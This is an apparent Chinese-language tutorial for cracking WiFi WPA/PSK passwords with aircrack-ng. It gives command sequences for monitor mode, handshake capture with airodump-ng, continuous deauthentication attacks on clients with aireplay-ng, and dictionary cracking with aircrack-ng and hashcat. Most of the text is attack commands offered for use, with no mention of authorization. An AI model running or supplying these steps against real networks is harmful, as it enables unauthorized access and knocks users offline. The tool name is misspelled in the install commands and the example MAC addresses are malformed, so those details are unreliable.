安装
安装的话可以直接安装
yum install aircack-ng
apt install aircack-ng
默认打开是管理模式,其中有monitor(监视)模式,将网卡转换为扫描周围wifi。
扫描
1 2 3 4 5 6 7 8 9 10
| ifconfig #查看一下网卡 #如果没有那么就加载一下网卡,有你自己的就忽略掉 ifconfig wlan0 up
airmon-ng start wlan0 #wlan0将成为wlan0mon,成为监视模式
airodump-ng wlan0mon #开始监视
|
握手包
1 2 3 4
| airodump-ng -c 11 --bssid 1A:2W:E3:E3:R4 -w /home/WP wlan0mon #然后攻击断线下,有抓到会显示hand-work #-c 11,11是信道参数,--bssid是bssid值,-w 这里是保存的路径,最后是网卡名 #攻击掉线重连抓到握手包,文件.cap会储存在/home下,最后就是解包了
|
攻击掉线
1 2 3
| aireplay-ng -0 0 -a 1A:2W:E3:E3:R4 -s 3E:R4:R4:D3:2W wlan0mon #-0 0代表就是攻击参数,0是一直发,1是攻击一次。-a 是wifi的mac地址。-s 是客户端的mac地址。最后是网卡名 #如果是0,持续攻击的话,有掉线后就可以取消攻击了
|
解包
1
| aircrack-ng ***.cap -w ./passwd.txt
|
数据包处理
1 2
| #解密包 airdecap-ng -e AP名 -p 密码 ****.cap
|
hashcat破解握手包密码
1 2 3 4
| #用aircrack-ng把cap转换成hccap类型数据包 aircrack-ng <input.cap> -J <out.hccap> #用hashcat破解WPA/PSK密码( -m 2500为破解的模式为WPA/PSK方式) hashcat -m 2500 testap.hccap pass.txt
|